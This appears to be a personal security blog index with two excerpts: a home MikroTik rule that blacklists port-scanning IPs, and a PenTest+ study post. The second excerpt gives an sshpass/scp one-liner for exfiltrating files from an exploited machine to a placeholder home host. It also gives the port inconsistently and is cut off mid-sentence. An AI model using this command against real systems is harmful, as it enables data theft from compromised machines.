Blocking Bad Guys

In my last blog post I went over some firewall security rules that I have set up. Since then I’ve been thinking about how I can continue to increase the security of my home network. What I came up with was to block traffic from any IP that visits my common ports. I created a filter rule that looks for people checking ports 21,22,23,25,53,110,111,135,139,143,445,993,995,1723,3389,5900 over the WAN interface. The rule then adds the user to a bad-guys list for a week; all traffic from the bad-guys list is dropped. [Read More]

Mikrotik Firewall Security

As I continue to work towards my PenTest+ certification I am continually making scripts along the way and improving security. I first started working on a way to exfiltrate data if I exploited a machine. I want to easily send data to a command and control center, if you will. The one-liner I came up with (I love one-liners!) is sshpass -p SCP_PASSWORD scp -P 22222 file.txt scpuser@HOME_PUBLIC_IP:/home/scpuser. This command uses sshpass to pass off my pass when trying to authenticate the scp command. I use -P 222222 because for the port I am using, file. [Read More]